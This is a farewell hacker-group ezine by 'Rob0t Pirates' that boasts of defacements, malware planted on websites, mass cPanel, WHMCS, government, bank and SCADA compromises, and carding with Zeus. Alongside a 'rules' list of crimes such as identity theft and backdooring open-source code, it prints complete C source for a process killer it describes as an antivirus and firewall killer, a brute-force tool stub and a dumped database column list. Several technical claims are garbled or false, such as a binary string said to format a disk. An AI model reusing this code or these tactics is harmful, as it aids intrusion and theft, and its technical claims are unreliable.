"In the name of Allah the Most Gracious the Most Merciful"
___ _ _ ____ _ _
| _ \ ___ | |__ ___ | |_ | _ \(_)_ __ __ _| |_ ___ ___
| |_) |/ _ \| '_ \ / _ \| __| | |_) | | '__/ _` | __|/ _ | __|
| _ <| (_) | |_) | (_) | |_ | __/| | | | (_| | |_| __|__ \
|_| \_\\___/|_.__/ \___/ \__| |_| |_|_| \__,_|\__|\___|___/
[#] Rob0t Pirates is Officially Closed!
y0. So this is the End....!!!!
I am really not good in saying Good bye. But i have to say that! No other Option For me! The best way to express our self is by writing izzue, And i think we are 1st one in Pakistani hackers who wrote ezine.
[#] "Too hot to handle, Too cold to hold ... Internet belong to Us! Not we Belong to net"
~Intr0dukti0n
There Was 5 Group Members and 1 p0lee in "Rob0t Pirates".
i) Cfr
He is Xtream Programmer. Master in Visual basic, Assembly and know all kinds of server Attacks and major Defacer of Robot Pirates. He coded many hacking tools and really good in windows files system and dll injections. Due to his knowledge in Operating system, he can create Viruses, Malwares, RAT and system errors.
Note: Never Ever mess with this person. If you did mistake of messing then there will be NO Place for you to hide.
[#] Contact Info:
ii) Reaper Grim
SQL injection Master of Robot pirates. He can inject All kind of sql, Xml, html, joomla, word press and many other kinds of injection. He mostly Attack Databases. And he also find many priva8 bugs. He is hell hacker. One more thing, he is "khan". You know what i mean. XD
[#] Contact Info:
iii) Zqor
Cracker of Robot Pirates. He has awesome skills in Reverse Engineering. He Can Crack different kind of Software, games, files, Cracking Hashes and registry hacking. He is also good in assembly & C.
Note: Never mess with this Arabic. He is From Libya but hell dangerous person. Batata lover...!!!
[#] Contact Info:
iv) Ninja Kai
Spammer & Graphic Designer of Robot Pirates. He is Good in C, C++ and Python. He mostly work in Linux Server, Linux Server rooting, Accounts hacking, Viruses, Trojans and b0ts are his specialty. He is also have good skills in Photoshop, Graphic and web development.
Note: Ninja's are every where so always expect them. He work really quietly and good in manners & Social Engineering.
[#] Contact Info: ninjakai04@yahoo.com
v) Cos b0t (3xploit)
He is master in PHP, delphi and Perl. He wrote many viruses and b0ts. He can also good in cracking Cpanels. Server rooting of Windows server is his specialty. He also coded some b0ts and scripts in php.
Note: 3xploit is a kind of person that if he go after any thing he will never give up. Not at all so never challenge him.
Note: 3xploit is a kind of person that if he go after any thing he will never give up. Not at all so never challenge him.
[#] Contact Info:
#) Polee
"Polee Wana Cracker" is our parrot. You will find a green parrot on Rob0t pirates Deface pages and Every where with us. He is also part of our family. :P
We was not only Hacking Group, i think we was more than that in Rob0t Pirates. Like a real family or Like real brothers. :)
- We Code...
- We Hack...
- We Crack...
- We Enjoy....
- We Fight....
- We Rob0ts..
- We Pirates..!!!!
- We are Rob0t Pirates......!!!!!!
=================================================================
~Ru13s 1n Rob0t Pirates
Some public thinks that being a hacker is easy. No Dude! Not at all! You have to lost lot of stuff :(
CHECKOFF EACH TASK WHEN COMPLETED THEN YOU CAN BECOME REAL ROBOT PIRATES
[ ] GET RID OF YOUR GIRLFRIEND
[ ] QUIT FACEBOOK
[ ] QUIT SITTING THERE
[ ] QUIT GOING TO SCHOOL
[ ] QUIT YOUR JOBS
[ ] STEAL FOR A LIVING
[ ] ROB WHITEHATS AND STOLE STUFF
[ ] GO SELL BLOOD PLASMA TO PAY FOR FOOD
[ ] ONLY EAT CHEAP TACOS & BATATATATATATA.......
[ ] LIVE AT THE LIBRARY
[ ] HACK FROM THE LIBRARY
[ ] STEAL ADMIN ACCESS
[ ] STEAL BOOKS DAILY AND PAWN THEM
[ ] STEAL PEOPLE'S WALLETS
[ ] USE THEM FOR IDENTITY THEFT AND TO BUY MORE CHIPS
[ ] GO AND HACK SOME BITCHES
[ ] SCAN SECURITY COMPANY NETWORKS DAILY
[ ] PASSWORD GUESS EVERY ACCOUNT YOU CAN
[ ] SOCIAL ENGINEER USERS AND ADMINS
[ ] LIE TO EVERYONE YOU KNOW
[ ] START WARS AMONG THE SECURITY INDUSTRY
[ ] HACK RANDOM BOXES AND WAIT FOR OTHERS TO HACK THEM
[ ] OWN EVERYTHING
[ ] RM EVERYONE WHO SPAMS
[ ] RM EVERYONE WHO MAKES MONEY FROM SECURITY
[ ] RM EVERYONE WHO HELPS OTHERS MAKE MONEY FROM SECURITY
[ ] CONVERT OTHERS TO BLACKHAT
[ ] DO NOT TALK TO PRESS
[ ] MAKE UP RUMORS AND SPREAD THEM
[ ] DUMPSTER DIVE AT SECURITY COMPANIES
[ ] BREAK INTO WHITEHATS HOUSES
[ ] TAP WHITEHAT'S PHONES, FAXES, AND STEAL THEIR MAIL
[ ] AUDIT CODE EVERYDAY
[ ] DO NOT TELL OTHERS OF YOUR VULNERABILITIES
[ ] MAKE FUN OF ALL OTHER
[ ] MAKE EXPLOITS
[ ] EMAIL BOMB EVERYONE ON FULL DISCLOSURE
[ ] BACKDOOR IF YOU FEEL ANY DANGER
[ ] TOLD STORY TO YOUR FAMILY
[ ] CONCENTRATE ON OWNING
[ ] HAVE NO REMORSE
[ ] JOIN WHITEHAT GROUPS[ ] RM THEM WHEN YOU HAVE ACCESS
[ ] DONT LET PEOPLE FUCK WITH YOU [CFR MAKE THAT RULE]
[ ] DO NOT TALK TO N00BS
[ ] IMPROVE OPEN SOURCE CODE AND SUBMIT IT WITH BACKDOORS
[ ] CONVINCE YOUR FRIENDS TO COMMIT MAYHEM
[ ] SELL YOUR TV
[ ] DON'T WASTE TIME PLAYING GAMES
[ ] SNIFF EVERY NETWORK YOU HAVE ACCESS TO
[ ] SELL DRUGS TO THE KIDS OF WHITEHATS
[ ] THREATEN WHITEHATS WITH LAW SUITS
[ ] BECOME A WHITEHATS ONLINE GIRLFRIEND
[ ] SET UP LOGGING PROXIES AND POST THEM TO PUBLIC
[ ] REMEMBER THAT ALL WHITEHATS SMELL
[ ] REPORT ALL EMAIL FROM SECURITY COMPANIES AS SPAM
[ ] FLOOD ALL IRC CHANNELS
[ ] FIND PHONE NUMBERS FOR ALL PEOPLE IN SECURITY
[ ] ZQOR HAS TO DRIVE SLOW
[ ] NINJA CAN BE SEEN
[ ] CFR DON'T DATE ANY MORE WITH GIRLS
There are all rules must remember by Rob0t Pirates X-D
================================================================
~ Our Respected Enemy:
Friday, February 3, 2012 Was Officially the 1st day of Rob0t Pirates. And it was really really interesting and Adventurous Experience.
Most [#]Respected Enemy of Rob0t Pirates "Godzilla" From India. This person was one of reason to make Robot Pirates.
He is really nice person that for sure and Really hate Pakistan. But
he was the one who give us reason to make Rob0t Pirates. :P He came up
with some thing called "Malwares" :P
That was a day that godzilla
attack of Pakistani government server and all Paskitani hacker are
watching faces of each other. And we decide to enter in fight and we put
malwares in some site and who ever open those sites there PC freezes.
Simple buffer sending in memory Code lol...!!! But that's for sure that India's
hacker leave at once. And they did not attack with malwares again. So as
we do.
Then when whole India Pakistan drama ends then at night we start to Google about malwares and read A to Z every thing we find. Then we start to code and make a dammmm.. cool and Full time Dangerous Malwares X-D
Now i am 100% sure that NO one in Pakistan can meet our level in Malwares and Viruses. YooO!
[#] "Do not think you are better than us, You are not"
One funny movement was that we tested malware in our own PC and that was NO fun at all! :P Then i have to install Windows again. lol
After that when ever we make any malware or Viruses codes. We have toss that who will going to Test it hahaha...
Our Mostly Targets:
- - NATO Sits
- - Myanmar
- - USA Sites
- - Hackers Sites
- - Key-logger sites :P
- - Governments Sites
- - WHMCS & cpanels(3000 cpanels are still here in my PC ;))
- - Hosting Sites
- - And Our Best Jagar India :P
We have a huge list of enemies now. Making enemy is also our one of rule so there is no need to take any tension. It become quit common for us! :-D
=================================================================
~ Our Friends:
Before moving to our hacking skills and ways we will prefer our Friends and supports.
There are some of our Supporters and we would really really Like to Name them. 1st person who Encourage us most is "Pakistani Ghost" i mean one and only "Hitcher".
See there is chain going. We got Dr Ninja who is student of Hitcher. And Hitcher is student of Jerry Hassan. One more thing, teacher in hacking don't mean that some one will teach you hacking. Teacher only support you and tell you what will be good or Bad for you. That's really mean in Cyber World. Trust me!
So why we put Hitcher name at 1st place. Reason is simple he deserves 1st in our list due to his manners. Always supportive from heart.
On 2nd number we will name our best friends "Khorasan CyberArmy"
CyberCode Khorasan, JinCorn, An0nym0uZ-17 & our beloved Tor Demon & Cep Engking. Today i am also going to tell a secret about Cep Engking. He sell his PC to buy a new cell phone. :P and he do all his injection from his mobile. hahahaha... They are like real brothers of Rob0t Pirates :D
Other Friend from Different Counties:
- Turkish Cyber Pirates From Turkey.
- Khorasan Cyber Army From Indonesia.
- BLACK NEWBIE TEAM From Malaysia.
- AnoNymOus DZ From Algeria.
- Bangladesh Cyber Army From Bangladesh.
- Teamr00t From Earth.
- Joiner Urdu Hack From Pakistan.
- Muslim Liberation Army From Pakistan.
Love you brothers...!!!
How can we forget RJ's. Those are really k00l dudes. One they i say for them that we always cheer us up! I think they are mostly in friendsforever Group.
[#] "Hacking in not only about getting in server, coding or say bad words. It is about Hard working making Friends, Trust and giving Time"
================================================================
~ Rob0t Pirates ^_^
+-+-+-+-+-+ +-+-+-+-+-+-+-+ |R|o|b|0|t| |P|i|r|a|t|e|s| +-+-+-+-+-+ +-+-+-+-+-+-+-+
Now we lets talk about our hacking styles ho ho ha ha ...
I Love this part. :P
1st of all we are not defacer. We are kind of different. Our fight is with operating System. When ever, we hack any System or server then most important thing is to check the Check List.
- - Check out mails hidden directories in System ... CHECK
- - Backdoored the system to get root... CHECK
- - Installed a keyboard logging device... CHECK
- - Steal all useful stuff ... CHECK
- - If D Level sites in server ... Let them remain Alive... CHECK
- - Music will ON while hacking... CHECK
In starting days. Non of us know how to use zone-h. And Still i don't know But who cares i am pirate :D I am thinking to paste that chat when we was trying to use zone-h but if i did any other Pirates may kill me :P
End result was "Zone-h suckssss... and Really difficult to use lol..!! And only for defacers. We got fresh knowledge about malwares so we decided to test on zone-h.
And zone-h is still vulnerable to our malware. yeah yeah we know that It was really bad thing to do. Now Zone-h came in our Respect List and we consider zone-h as Heaven of Hackers.
Then our 2nd attack was on Facebook. We uploaded malwares in Facebook. 1st Facebook gone offline for 4 to 5 minutes. That was a huge attack so we decided not to tell any one about this attack. :P
Our actions create many issues for us by Facebook. 1st issue Facebook delete our secret Group and our profiles. After that we make about 7 pages. All gone! :p Dammm... you Facebook. We will hit a book on marks face. And we did.
1st news came in Media was our porn server Attack. we hack about 150 porn sites and also get premium account of porn, 10$ per account hahahahaha... And
we dump data base about 300 to 400 accounts. But i am dammm... true i did not open a
one account. :) Only Check accounts at the day we hack not again
Then Cpanels season came. We hack huge amount of cpanels. 1000's of cpanles. That was really fun. We where ever we find any cpanal we crack them.
Time was passing quit good. Some bithes came and show us new thing.
Guss what ????
WHMCS
Ho ho ha ha ha . . .
Bring it On! We decide to hack whmcs. 1st we read the internal working of whmcs and then every day whmcs. To be very frank we hack too many whmcs. too many to them. Some one challenge us in WHMCS Hacking. There was many barking bitches those need to go to dentist.
Now we have new fight and they point us that you are zero in Government sites. hummmm... so that's what they want. Then we hack about 500+ Government sites. And say to them . . . Fuck off bitches!!
Now it is time to tell you secrets. We also hack CC and use zeus b0t. But all those who hack by us was lucky. We are Muslims so we decide not to steal money.
Priva8 Codes:
There was some stuff that is totally private. For example
we can run .exe by just clicking on Link.
One more our priv8 thing was our Crypter with our own custom algorithm.
Our extention changer.
Our AV Killer.
We code all our spamming stuff by our own. Own coded Stealer, binder and Key-logger. We also hack of key logger sites. But i am sure that our key-logger is more better than others. One of keylogger of Linux server i really like
void usage() {printf("[-] Usage: ./uingen -f <first-uin> -l <last-uin> [-po]\n");
printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n");
printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n");
printf("[-] -f First UIN\n");
printf("[-] -l Last UIN\n");
printf("[-] -s Single UIN/Wordlist Mode [-w required]\n");
printf("[-] -w Wordlist [for single UIN mode only]\n");
printf("[-] -p Password [default: password]\n");
printf("[-] -o Outfile [default: outfile.txt]\n");
exit(1);
}
i am not giving code but this work quit well.
That is huge advantage for programmers. Code what ever you want.
We swear in Group that theses stuff only remain in our group and will not be public. I will also mention in next section why we did not make this stuff public. ;)
We also got mails from Web Admins that they are going to catch us hahahahhaha.... That was really funny joke. XD
And look what they found in logs :P
ps -l
whoami
alex
processing killing commands was disable for common user so we make some code which forcefull kill the process.
//xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
// Robot Pirates
// Author Dr Ninja of Robot Pirates
// Private Tool to Kill any kind of Firewall and Antiviruse
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
BOOL KillProcessUseName(char *szProcessToKill);
// Main function
int main(int argc, char* argv[])
{
if(argc > 1) // In case of argument
{
KillProcessUseName(argv[1]);
}
else
{
// List all Process names to kill those Process
KillProcessUseName(""); // We put name of file.exe which stop us
}
return 0;
}
BOOL KillProcessUseName(char *szProcessToKill)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // Takes a snapshot of all the processes
if(hProcessSnap == INVALID_HANDLE_VALUE)
{
return( FALSE );
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if(!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return( FALSE );
}
do{
if(!strcmp(pe32.szExeFile,szProcessToKill)){ // checks if process at current position has the name of to be killed app
hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID); // gets handle to process
TerminateProcess(hProcess,0); // Terminate process by handle
CloseHandle(hProcess); // close the handle
}
}while(Process32Next(hProcessSnap,&pe32)); // gets next member of snapshot
CloseHandle(hProcessSnap); // closes the snapshot handle
return( TRUE );
}
//xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
just need to find process id and kill it. Bingo!!
This leads to buffer overflows.
Even using this binary:
010010110001111100100101010101?01010000011111100000
make .exe file of this and this will format your hard drive. XD
You can use pointers and Signals to create real bad sectors in Hard Drive. And data will also not able to recover. No Chance!
Rob0t Pirates was really good with .htaccess files :P this is not possible that we was not able to bypass any htaccess file. XD No Chance at all..!!!
We also make traffic malware. And it was AwesomeeeeEEeeEE..!!!!
Never Under estimate the power of java script.
We was also really good in stealing shells of hacked sites. Most of Indian hacker user password ="h4ck3r" on there shells lol...
One very famous hacker use shell name 4O3.pl and hide his shell in 403 place . . . I Don't want to name the hacker name but it was really really fun. And we restore many sites.
[#] "Hater are always gonna hate you. So its Better to Ignore them"
There are lot of stuff in tatasky.com data base. Here are the tables of DB.
Membres membre connexion nom hachage adresse e-mail arquivo authentification usr_pw userpasswd title telephone pwd1 pswd POWER pe_aduser Numer note musername msn mpassword memberid member_id key glmm adminpsw xar_name about lastname temppasword temp_pass page store4 store1 store spacer sid setting session_member_login_key secretquestion secretanswer search number nick nc last_ip kpro_user ipaddress index images homepage hash group_name full fjalekalimi emer e-mail cvvnumber] customers_password customer crack converge_pass_salt converge_pass_hash contact conf client cc_type cc_owner cc_number authentication authenticate auth aim aid pword punetoret psw privacy personal_key perdorimi passwort passwordsalt passwd passw pass1word pass_w pass_hash p_word myusername mypassword my_name nome mima mempassword member mem_passwd lozinka logo loginkey login_pw login_admin usrs usrpass usrnm usrnam usr_pass usr_name userpw userlogin userip userid user1 user_usernm user_username user_uname user_un user_pwrd user_pwd user_passw user_n user_login user_level user_email uPassword tusername building now un uid u_password u_name adminusername adminuserid adminuser admins adminpaw adminpass adminname adminmail adminlogin administrators administrator_name secret_code code loginpwd loginpass loginpasswd loginpassword tukhoa pas accountname aname u_id ten tennguoidung tenquantri tendn admin_password admin_pass admin_name fldpwd flduserpass fldpassword fldpass accnts access permission pwd login_name user_name uname user password
That was one of huge data base i ever saw. :O thousands of rows :O
Found lot of money in tatasky but we are Proud to be Muslims so did not steal money. We hack many banks data bases and believe me there security really suckssss...!!! They are lucky that we are Muslims.
In Last i will talk about our Last project, Which was SCADA system. And we also own SCADA system of Israel. It is one of most enjoyable thing as Hacker. See live streaming of cameras on Roads, Labs, factories and lot of other stuff.
SCADA was Last project of Rob0t Pirates. Lets see where life take us in future.
~ Our Motivation
Robot Pirates song lyrics:
Yo ho ho and a bottle of ram.
Yo Mickey, straight out of Davy Jones' Locker.
This one goes out to all my fellow robot pirates.
We be brining it with all the skulls and crossbones.
Throw your antennas in the air and wave them as like you just don't compute.
We are the robot pirates.
We have robot functions.
But we have pirate duties.
For instance: we're able to reboot.
And we search for booty.
We ware eye patches and are feared by the masses.
I have a parrot sitting on my titanium chassis.
That's why you'll hear him say,
"Polly wanna cracker".
She's powered by a miniature nuclear reactor.
She helps to defend our ship from any attackers.
Who's your biggest enemy? Computer hackers !
[CHORUS]
We are the robot pirates.
We are made of metal from our heads to our privates.
We are the robot pirates.
Robots are good and pirates are good,
We do all the things that a robot should,
I spoke to him in binary and he understood.
We also do all the things that a pirate should.
My leg malfunctioned so I got one of made of wood.
Yes, break it down now.
I'm really feeling empty.
Shake it shake shake it,
Shake it shake shake it,
Shake it shake shake it,
Shake it like a sword with a dead guy on it.
Shake it shake shake it,
Shake it shake shake it,
Shake it shake shake it,
Shake it like a sword with a dead guy on it.
[CHORUS]
We are the robot pirates,
We are made of metal from our heads to our privates.
We are the robot pirates,
Instead of a chest, treasure goes in memory banks.
If you try to shut me down I will make you walk the plank.
I can cut people open and I don't have to try.
And I got a sweet telescope built into my eye.
Oh I have to indulge when the ladies beckon.
Watch me mop the poop deck in 11 seconds.
I can drop the anchor 'cuz I know how to work it.
We can't touch the water because it makes us short circuit.
WE ARE THE ROBOT PIRATES
Enjoy! and Learn! :D
And our Deface Page
~Life Experience
0ne thing we are really sad about when in 1st month we came. We ask many peoples for help. but they don't help us. we need some tools and some stuff to take start in hacking but all of other hacker around us kick us really badly and abuse us :'(
Really sad time for us.
Then we decide that we code every thing by our own and Don't share at all. Every tool will remain only in our Group!
We Code:
- - SQL Scanner
- - Extension Changer.
- - Junk Changer
- - Last modified changed.
- - XXS Scanner
- - Keylogger
- - Stealer
- - Daface page gernator
- - Process killer.
- - Shell and also some other shell with different name.
- - Windows mass defacer
- - tool bars.
- - fb app's
- - .htaccess codes
- - Scripts
- - DDOS Tool
- - World best Crypter. *****
~Reason to Leave Hacking World
There is only one mistake we made. That we trust some people and thought they are our friends and we help them as much as we can. But in the end they treat us like Dogs. I swear that was worst night when we came to know that they only use us. :(
"Allah will help them. Those are some sick peoples and can't be healed"
We though it is better if we leave every thing here and move back to our real life. Quit bad luck for us that Pakistani hackers become reason for us to leave Cyber World :(
Now many peoples ask why you leaving. Why you not fighting Back.
The answer is "We are not like them & They Don't deserve Us!".
Allah Give us respect all over the world, Not them.
I though i shall writer some more experiences but i think, i don't want to write any more.
[#] "Always care about what Allah have give you. Don't run after what is not yours"
We are leaving and i hope this will make them feel good. Game is 0ver Today! :'(
For all noobs learn Programming. That's really hacking. Tricking Hackers are nothing from inside! Make your own codes and ways of hacking. And Friendship is lot more important then hacking. Work in Teams. Not more than 5 members team. And Remember "Nothing is impossible, Its just matter of Time". And Never ever leave your Team mates. Mark our words that where ever you join at the end you will have to came back to your team.
[#] "Hacking really mean is to Explore System by Your 0wn Way, Not Doing same thing again & again"
[#] "No One Respect you! Peoples only respect you Knowledge!"
We are really really sorry to all our Fans, Supporter, Rj's, Media persons Specially (Isti form THR, Death Angle, Tor Demon, Spoiler), Allah Bless you All! And we are also really thankful to Dr Ninja for writing this "ezine".
Gladiators! Now we are free..!!
[#] "You can remove a Hacker from Hacking but you can't remove Hacking from a Hacker"
We will NOT be responsible if some one use our Logo Or Name! Rob0t Pirates is Dead and if some one say that Rob0t Pirates Open or any thing That will be fake!
All members have Quit hacking and left the internet.
Game is 0ver!
rm -rf Rob0t_Pirates.